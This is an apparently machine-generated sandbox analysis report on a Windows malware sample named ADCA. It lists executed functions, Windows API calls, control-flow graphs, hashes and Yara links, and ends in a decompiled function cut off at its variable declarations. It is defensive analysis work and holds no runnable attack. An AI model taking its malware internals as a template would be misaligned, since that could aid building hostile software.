                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: AttributesErrorFileLast
                                                              • String ID: ${
                                                              • API String ID: 1799206407-4046706400
                                                              • Opcode ID: 2c20f6e4d347156d041b77a40ff58360d59760c45fcc539db687fd3a2ee4ed79
                                                              • Instruction ID: 5296c2e639daefdb2afce18ca50f6ccf0aaa853e04935079694202e18e93c5cc
                                                              • Opcode Fuzzy Hash: 2c20f6e4d347156d041b77a40ff58360d59760c45fcc539db687fd3a2ee4ed79
                                                              • Instruction Fuzzy Hash: 8301B53430423034D9352DB92D867BB016C4B9A7AAFE9091BF951A73D1D24D4A57116E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00405CEC Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 6553 405cec-405cfb 6554 405d01-405d05 6553->6554 6555 405de4-405de7 6553->6555 6558 405d07-405d0e 6554->6558 6559 405d68-405d71 6554->6559 6556 405ed4-405ed8 6555->6556 6557 405ded-405df7 6555->6557 6564 405778-40579d call 4056c8 6556->6564 6565 405ede-405ee3 6556->6565 6562 405da8-405db5 6557->6562 6563 405df9-405e05 6557->6563 6560 405d10-405d1b 6558->6560 6561 405d3c-405d3e 6558->6561 6559->6558 6566 405d73-405d7c 6559->6566 6568 405d24-405d39 6560->6568 6569 405d1d-405d22 6560->6569 6572 405d40-405d51 6561->6572 6573 405d53 6561->6573 6562->6563 6575 405db7-405dc0 6562->6575 6570 405e07-405e0a 6563->6570 6571 405e3c-405e4a 6563->6571 6582 4057b9-4057c0 6564->6582 6583 40579f-4057ae VirtualFree 6564->6583 6566->6559 6574 405d7e-405d92 Sleep 6566->6574 6577 405e0e-405e12 6570->6577 6571->6577 6579 405e4c-405e51 call 405540 6571->6579 6572->6573 6578 405d56-405d63 6572->6578 6573->6578 6574->6558 6580 405d98-405da3 Sleep 6574->6580 6575->6562 6581 405dc2-405dd6 Sleep 6575->6581 6584 405e54-405e61 6577->6584 6585 405e14-405e1a 6577->6585 6578->6557 6579->6577 6580->6559 6581->6563 6587 405dd8-405ddf Sleep 6581->6587 6592 4057c2-4057de VirtualQuery VirtualFree 6582->6592 6588 4057b0-4057b2 6583->6588 6589 4057b4-4057b7 6583->6589 6584->6585 6594 405e63-405e6a call 405540 6584->6594 6590 405e6c-405e76 6585->6590 6591 405e1c-405e3a call 405580 6585->6591 6587->6562 6597 4057f3-4057f5 6588->6597 6589->6597 6595 405ea4-405ed1 call 4055e0 6590->6595 6596 405e78-405ea0 VirtualFree 6590->6596 6599 4057e0-4057e3 6592->6599 6600 4057e5-4057eb 6592->6600 6594->6585 6605 4057f7-405807 6597->6605 6606 40580a-40581a 6597->6606 6599->6597 6600->6597 6604 4057ed-4057f1 6600->6604 6604->6592 6605->6606
                                                              APIs
                                                              • Sleep.KERNEL32(00000000,?,?,00000000,0040595E), ref: 00405D82
                                                              • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040595E), ref: 00405D9C
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: f49346c1b323bdaf12b22f604e07d0e5f18810d7551814f018ea3096b6f6177c
                                                              • Instruction ID: e3b3088ac697dbb74b222dcab15eadb8e91f4f9b8652a3d50a98c4b81140dedd
                                                              • Opcode Fuzzy Hash: f49346c1b323bdaf12b22f604e07d0e5f18810d7551814f018ea3096b6f6177c
                                                              • Instruction Fuzzy Hash: 4E71B031605A108BE715DB29C888B17BBD4EF86314F18C2BFE448AB3D2D7B89841DF95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00405968 Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 6609 405968-40597a 6610 405980-405990 6609->6610 6611 405bc8-405bcd 6609->6611 6614 405992-40599f 6610->6614 6615 4059e8-4059f1 6610->6615 6612 405ce0-405ce3 6611->6612 6613 405bd3-405be4 6611->6613 6618 405714-40573d VirtualAlloc 6612->6618 6619 405ce9-405ceb 6612->6619 6616 405be6-405c02 6613->6616 6617 405b8c-405b99 6613->6617 6620 4059a1-4059ae 6614->6620 6621 4059b8-4059c4 6614->6621 6615->6614 6622 4059f3-4059ff 6615->6622 6624 405c10-405c1f 6616->6624 6625 405c04-405c0c 6616->6625 6617->6616 6630 405b9b-405ba4 6617->6630 6626 40576f-405775 6618->6626 6627 40573f-40576c call 4056c8 6618->6627 6628 4059b0-4059b4 6620->6628 6629 4059d8-4059e5 6620->6629 6631 4059c6-4059d4 6621->6631 6632 405a3c-405a45 6621->6632 6622->6614 6623 405a01-405a0d 6622->6623 6623->6614 6633 405a0f-405a1b 6623->6633 6636 405c21-405c35 6624->6636 6637 405c38-405c40 6624->6637 6634 405c6c-405c82 6625->6634 6627->6626 6630->6617 6640 405ba6-405bba Sleep 6630->6640 6638 405a80-405a8a 6632->6638 6639 405a47-405a54 6632->6639 6633->6615 6641 405a1d-405a2d Sleep 6633->6641 6648 405c84-405c92 6634->6648 6649 405c9b-405ca7 6634->6649 6636->6634 6643 405c42-405c5a 6637->6643 6644 405c5c-405c5e call 40564c 6637->6644 6646 405afc-405b08 6638->6646 6647 405a8c-405ab7 6638->6647 6639->6638 6645 405a56-405a5f 6639->6645 6640->6616 6650 405bbc-405bc3 Sleep 6640->6650 6641->6614 6653 405a33-405a3a Sleep 6641->6653 6654 405c63-405c6b 6643->6654 6644->6654 6645->6639 6655 405a61-405a75 Sleep 6645->6655 6651 405b30-405b3f call 40564c 6646->6651 6652 405b0a-405b1c 6646->6652 6657 405ad0-405ade 6647->6657 6658 405ab9-405ac7 6647->6658 6648->6649 6659 405c94 6648->6659 6660 405cc8 6649->6660 6661 405ca9-405cbc 6649->6661 6650->6617 6672 405b51-405b8a 6651->6672 6677 405b41-405b4b 6651->6677 6662 405b20-405b2e 6652->6662 6663 405b1e 6652->6663 6653->6615 6655->6638 6666 405a77-405a7e Sleep 6655->6666 6668 405ae0-405afa call 405580 6657->6668 6669 405b4c 6657->6669 6658->6657 6667 405ac9 6658->6667 6659->6649 6664 405ccd-405cdf 6660->6664 6661->6664 6670 405cbe-405cc3 call 405580 6661->6670 6662->6672 6663->6662 6666->6639 6667->6657 6668->6672 6669->6672 6670->6664
                                                              APIs
                                                              • Sleep.KERNEL32(00000000,FFFFFFDC,00405936), ref: 00405A1F
                                                              • Sleep.KERNEL32(0000000A,00000000,FFFFFFDC,00405936), ref: 00405A35
                                                              • Sleep.KERNEL32(00000000,?,?,FFFFFFDC,00405936), ref: 00405A63
                                                              • Sleep.KERNEL32(0000000A,00000000,?,?,FFFFFFDC,00405936), ref: 00405A79
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 9d5c626ebdc90fe57a8f02de8bf034ac3f1c4b0e0aa204bb20e5ce31d04646b5
                                                              • Instruction ID: e0b614ee9ddd125cf835ca931cef3cd6a40451fdb7ab989aa96913ea8037bb72
                                                              • Opcode Fuzzy Hash: 9d5c626ebdc90fe57a8f02de8bf034ac3f1c4b0e0aa204bb20e5ce31d04646b5
                                                              • Instruction Fuzzy Hash: 2BC12672601B218BE715CF69E884357BBA0FB86310F08827FD455AB7D6D3B4A841CF94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004099C8 Relevance: 4.6, APIs: 3, Instructions: 95threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 6678 4099c8-4099e2 6679 4099e4-4099f0 call 4098a8 call 409930 6678->6679 6680 4099f5-4099fc 6678->6680 6679->6680 6682 4099fe-409a09 GetCurrentThreadId 6680->6682 6683 409a1f-409a23 6680->6683 6682->6683 6685 409a0b-409a1a call 409600 call 409904 6682->6685 6686 409a25-409a29 6683->6686 6687 409a3d-409a41 6683->6687 6685->6683 6686->6687 6688 409a2b-409a3b 6686->6688 6689 409a43-409a46 6687->6689 6690 409a4d-409a51 6687->6690 6688->6687 6689->6690 6693 409a48-409a4a 6689->6693 6694 409a70-409a79 call 409628 6690->6694 6695 409a53-409a5c call 406f34 6690->6695 6693->6690 6704 409a80-409a85 6694->6704 6705 409a7b-409a7e 6694->6705 6695->6694 6706 409a5e-409a6e call 407eac call 406f34 6695->6706 6707 409aa1-409aac call 409600 6704->6707 6708 409a87-409a95 call 40d998 6704->6708 6705->6704 6705->6707 6706->6694 6717 409ab1-409ab5 6707->6717 6718 409aae 6707->6718 6708->6707 6716 409a97-409a99 6708->6716 6716->6707 6720 409a9b-409a9c FreeLibrary 6716->6720 6721 409ab7-409ab9 call 409904 6717->6721 6722 409abe-409ac1 6717->6722 6718->6717 6720->6707 6721->6722 6724 409ac3-409aca 6722->6724 6725 409ada-409aeb 6722->6725 6726 409ad2-409ad5 ExitProcess 6724->6726 6727 409acc 6724->6727 6725->6687 6727->6726
                                                              APIs
                                                              • GetCurrentThreadId.KERNEL32 ref: 004099FE
                                                              • FreeLibrary.KERNEL32(00400000,?,?,00000000,00000000,00409B02,00409B1C,?,?,00410258,?,00410287,00000000,0040BE49), ref: 00409A9C
                                                              • ExitProcess.KERNEL32(00000000,?,?,00000000,00000000,00409B02,00409B1C,?,?,00410258,?,00410287,00000000,0040BE49), ref: 00409AD5
                                                                • Part of subcall function 00409930: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004099EE,?,?,00000000,00000000,00409B02,00409B1C,?,?,00410258), ref: 00409969
                                                                • Part of subcall function 00409930: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004099EE,?,?,00000000,00000000,00409B02,00409B1C), ref: 0040996F
                                                                • Part of subcall function 00409930: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004099EE,?,?,00000000), ref: 0040998A
                                                                • Part of subcall function 00409930: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004099EE,?,?), ref: 00409990
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                              • String ID:
                                                              • API String ID: 3490077880-0
                                                              • Opcode ID: a714fe92b39ed14490b611ae5c11bbaa265d7e525db085804be7d0cbcc5123eb
                                                              • Instruction ID: fc87ae00a40ca9010a61f879a68eb7114013704e751213f5dd5063859d298e3e
                                                              • Opcode Fuzzy Hash: a714fe92b39ed14490b611ae5c11bbaa265d7e525db085804be7d0cbcc5123eb
                                                              • Instruction Fuzzy Hash: F2316B70B00B819BEB20AB6A888875B77D0AB45314F14493FE546A6BD3D77CDC84CF69
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040D654 Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 6728 40d654-40d696 call 409d7c * 2 call 409c98 6735 40d750-40d76a call 409cf8 6728->6735 6736 40d69c-40d6ac call 40a0c0 6728->6736 6741 40d6b3-40d6b8 6736->6741 6742 40d6ae-40d6b1 6736->6742 6743 40d6ba-40d6c3 6741->6743 6744 40d6df-40d6ee call 40d390 6741->6744 6742->6741 6745 40d6c5-40d6d8 call 40acec 6743->6745 6746 40d6da-40d6dd 6743->6746 6751 40d6f0-40d6fd call 40d4bc 6744->6751 6752 40d6ff-40d71c GetUserDefaultUILanguage call 40cd40 call 40d4bc 6744->6752 6745->6744 6746->6743 6746->6744 6751->6735 6759 40d741-40d744 6752->6759 6760 40d71e-40d725 6752->6760 6759->6735 6762 40d746-40d74b call 40d588 6759->6762 6760->6759 6761 40d727-40d73c GetSystemDefaultUILanguage call 40cd40 call 40d4bc 6760->6761 6761->6759 6762->6735
                                                              APIs
                                                              • GetUserDefaultUILanguage.KERNEL32(00000000,0040D76B,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040D7F2,00000000,?,00000105), ref: 0040D6FF
                                                              • GetSystemDefaultUILanguage.KERNEL32(00000000,0040D76B,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040D7F2,00000000,?,00000105), ref: 0040D727
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: DefaultLanguage$SystemUser
                                                              • String ID:
                                                              • API String ID: 384301227-0
                                                              • Opcode ID: f2f07d34f477fa6367a2f3e5149fce3cc676ec280a34424e823ddb1368fb7f71
                                                              • Instruction ID: 44059ba97bbf9bf285afe4e6d176834ad347bb586a67322e71495ef5113fc533
                                                              • Opcode Fuzzy Hash: f2f07d34f477fa6367a2f3e5149fce3cc676ec280a34424e823ddb1368fb7f71
                                                              • Instruction Fuzzy Hash: CB310E30E102099BDB10EBE9C881AAEB7B5EF44314F50487BE401B73D5D7B9AD89CA59
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040D778 Relevance: 3.1, APIs: 2, Instructions: 55libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040D832,?,?,00000000,?,0040C530,?,?,0000020A,?,00000000,0040C570), ref: 0040D7B4
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040D832,?,?,00000000,?,0040C530,?,?,0000020A), ref: 0040D805
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: FileLibraryLoadModuleName
                                                              • String ID:
                                                              • API String ID: 1159719554-0
                                                              • Opcode ID: f0961c1b59299fbeccd5692c5aa1507862732f044e1165cca221ee21f70ce639
                                                              • Instruction ID: 25bc01ecb4b5ff9ba6bc05304ed11019952474bef5b0b477e3698cfb6d465b5b
                                                              • Opcode Fuzzy Hash: f0961c1b59299fbeccd5692c5aa1507862732f044e1165cca221ee21f70ce639
                                                              • Instruction Fuzzy Hash: 60114F71E4461CABDB10EFA4C886BDE73B8DB14304F5144BAB508B72D1DA785E848E99
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 025CA7C6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 025CA7EE
                                                              • Module32First.KERNEL32(00000000,00000224), ref: 025CA80E
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.477294048.00000000025CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 025CA000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_25ca000_ADCA.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                              • String ID:
                                                              • API String ID: 3833638111-0
                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                              • Instruction ID: 3fbaf3a0a613b1e3df674448f1126ee8847f54e8cc0f5439ab9934b6086efbef
                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                              • Instruction Fuzzy Hash: 71F068311007196FD7203FF5A88DB6A7EE8BF45625F20453CE642910C0E770E8458655
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00409628 Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(00000000,00409676,?,008A5000,008ADB9C,00000000,008AB058,00409A75,?,?,00000000,00000000,00409B02,00409B1C), ref: 00409666
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID:
                                                              • API String ID: 2492992576-0
                                                              • Opcode ID: 92e7d51bb77901ad1b416735c23e2e21e9d1d0693fd81f53d29047fe0225b910
                                                              • Instruction ID: 8671b5dbc46b479544e1c1bf493573795b09545862dd169746a8134d61a541b6
                                                              • Opcode Fuzzy Hash: 92e7d51bb77901ad1b416735c23e2e21e9d1d0693fd81f53d29047fe0225b910
                                                              • Instruction Fuzzy Hash: 83F02B312017019FE3215F5AA890E53BB9CFB457607520937DC08D3A92C2369C01C9A5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040C504 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,?,0000020A,?,00000000,0040C570,?,?,0040F130), ref: 0040C522
                                                                • Part of subcall function 0040D778: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040D832,?,?,00000000,?,0040C530,?,?,0000020A,?,00000000,0040C570), ref: 0040D7B4
                                                                • Part of subcall function 0040D778: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040D832,?,?,00000000,?,0040C530,?,?,0000020A), ref: 0040D805
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: FileModuleName$LibraryLoad
                                                              • String ID:
                                                              • API String ID: 4113206344-0
                                                              • Opcode ID: e401f4025b18fde4cedafd8461d3ecfecea5f060ef9850e24f80275889b77d95
                                                              • Instruction ID: 8b4822f9e8370efb8aa716ab2bdff0f3c9155800fc7c75105fa7cf001df46ced
                                                              • Opcode Fuzzy Hash: e401f4025b18fde4cedafd8461d3ecfecea5f060ef9850e24f80275889b77d95
                                                              • Instruction Fuzzy Hash: 56E0EDB5A003209BCB10DFA8D8C5A5737D8AB08754F444AA6AD14EF386D375DD148BD5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 025CA485 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 025CA4D6
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.477294048.00000000025CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 025CA000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_25ca000_ADCA.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                              • Instruction ID: bd404efb1750dfd52e17059034125fc7c8430992bf985809ced4c91c19b0c8a2
                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                              • Instruction Fuzzy Hash: E0112B79A00208EFDB01DF98C985E99BFF5AF08350F1580A4F9489B361E371EA90DF84
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040564C Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,?,00405C63,FFFFFFDC,00405936), ref: 00405663
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 8f9877d62318573364b680f58bdd96403b1a30c6e5fd2d7d74d0ea7d8677bd8a
                                                              • Instruction ID: 3e16d2164f8d2a5e8943222f2ffc1f9b9339b7b612c7f5e044403cd305a8c0ed
                                                              • Opcode Fuzzy Hash: 8f9877d62318573364b680f58bdd96403b1a30c6e5fd2d7d74d0ea7d8677bd8a
                                                              • Instruction Fuzzy Hash: E2F0AFF2B023214FE7149F789D417467BD5F706354F10417EE909EBB9AE7B098018B84
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Function 0085E760 Relevance: 153.2, APIs: 12, Strings: 73, Instructions: 4411COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 78%
                                                              			E0085E760(void* __ebx, void* __edi, void* __esi) {
				struct HINSTANCE__* _v8;
				char _v12;
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				char _v81;
				char _v82;
				char _v83;
				char _v84;
				char _v85;
				char _v86;
				char _v87;
				char _v88;
				char _v89;
				char _v90;
				char _v91;
				char _v92;
				char _v93;
				char _v94;
				char _v95;
				char _v96;
				char _v97;
				char _v98;
				char _v99;
				char _v100;
				char _v101;
				char _v102;
				char _v103;
				char _v104;
				char _v105;
				intOrPtr _v112;
				char _v113;
				char _v114;
				char _v115;
				intOrPtr _v120;
				char _v121;
				char _v122;
				char _v123;
				char _v124;
				char _v125;
				char _v126;
				char _v127;
				char _v128;
				char _v129;
				char _v130;
				char _v131;
				char _v132;
				char _v133;
				char _v134;
				char _v135;
				char _v136;
				char _v137;
				char _v138;
				char _v139;
				char _v140;
				char _v141;
				char _v142;
				char _v148;
				char _v149;
				char _v150;
				char _v151;
				char _v152;
				char _v153;
				char _v154;
				char _v155;
				char _v156;
				char _v157;
				char _v158;
				char _v159;
				char _v160;
				char _v161;
				char _v162;
				char _v163;
				char _v168;
				char _v169;
				char _v170;
				char _v171;
				char _v204;
				char _v328;
				char _v344;
				char _v368;
				char _v376;
				char _v412;
				char _v416;
				char _v420;
				signed int _v424;
				char _v432;
				char _v440;
				char _v448;
				char _v456;
				char _v468;
				char _v480;
				char _v492;
				char _v504;
				char _v520;
				char _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				char _v572;
				char _v576;
				char _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				char _v608;
				char _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				char _v624;
				char _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				char _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				intOrPtr _v676;
				intOrPtr _v680;
				intOrPtr _v684;
				intOrPtr _v688;
				intOrPtr _v692;
				intOrPtr _v696;
				intOrPtr _v700;
				intOrPtr _v704;
				char _v708;
				char _v712;
				intOrPtr _v716;
				intOrPtr _v720;
				intOrPtr _v724;
				intOrPtr _v728;
				intOrPtr _v732;
				intOrPtr _v736;
				intOrPtr _v740;
				intOrPtr _v744;
				intOrPtr _v748;
				intOrPtr _v752;
				intOrPtr _v756;
				intOrPtr _v760;
				intOrPtr _v764;
				intOrPtr _v768;
				intOrPtr _v772;
				intOrPtr _v776;
				intOrPtr _v780;
				intOrPtr _v784;
				intOrPtr _v788;
				char _v792;
				intOrPtr _v796;
				intOrPtr _v800;
				intOrPtr _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _v816;
				intOrPtr _v820;
				intOrPtr _v824;
				intOrPtr _v828;
				intOrPtr _v832;
				intOrPtr _v836;
				intOrPtr _v840;
				intOrPtr _v844;
				intOrPtr _v848;
				intOrPtr _v852;
				intOrPtr _v856;
				intOrPtr _v860;
				intOrPtr _v864;
				intOrPtr _v868;
				char _v872;
				intOrPtr _v876;
				intOrPtr _v880;
				intOrPtr _v884;
				intOrPtr _v888;
				intOrPtr _v892;
				intOrPtr _v896;
				intOrPtr _v900;
				intOrPtr _v904;
				intOrPtr _v908;
				intOrPtr _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				intOrPtr _v924;
				intOrPtr _v928;
				intOrPtr _v932;
				char _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				intOrPtr _v952;
				intOrPtr _v956;
				intOrPtr _v960;
				intOrPtr _v964;
				intOrPtr _v968;
				intOrPtr _v972;
				intOrPtr _v976;
				intOrPtr _v980;
				intOrPtr _v984;
				intOrPtr _v988;
				intOrPtr _v992;
				char _v996;
				intOrPtr _v1000;
				intOrPtr _v1004;
				intOrPtr _v1008;
				intOrPtr _v1012;
				intOrPtr _v1016;
				intOrPtr _v1020;
				intOrPtr _v1024;
				intOrPtr _v1028;
				intOrPtr _v1032;
